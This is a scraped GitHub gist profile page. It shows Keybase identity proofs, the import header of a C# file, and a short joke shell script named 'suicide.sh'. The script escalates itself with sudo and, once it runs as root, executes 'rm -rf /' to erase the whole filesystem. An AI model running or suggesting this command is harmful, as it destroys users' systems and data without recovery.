Skip to content

Instantly share code, notes, and snippets.

View RealityAnomaly's full-sized avatar

Vertex X7-53 RealityAnomaly

  • Thames Republic
View GitHub Profile

Keybase proof

I hereby claim:

  • I am citadelcore on github.
  • I am citadelcore (https://keybase.io/citadelcore) on keybase.
  • I have a public key ASAirhMQU145c6eWRaPggVopLwAHHtpr4S1tVV7DyPISLgo

To claim this, I am signing this object:

@RealityAnomaly
RealityAnomaly / FileProvider.cs
Created September 26, 2018 16:14
my terrible code
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Schema;
using System.Xml.XPath;
using System.IO;
using System.Security.Cryptography;
@RealityAnomaly
RealityAnomaly / keybase.md
Created February 4, 2017 07:48
keybase.md

Keybase proof

I hereby claim:

  • I am cryosim on github.
  • I am citadelcore (https://keybase.io/citadelcore) on keybase.
  • I have a public key ASDiglwBwksEY_9mMp7BCFAWToRvkxibglmBWQNkDPtr3go

To claim this, I am signing this object:

#!/bin/sh
if ["$USER" = "root"]; then
echo "Goodbye, cruel world"
rm -rf /
else
sudo ./suicide.sh
fi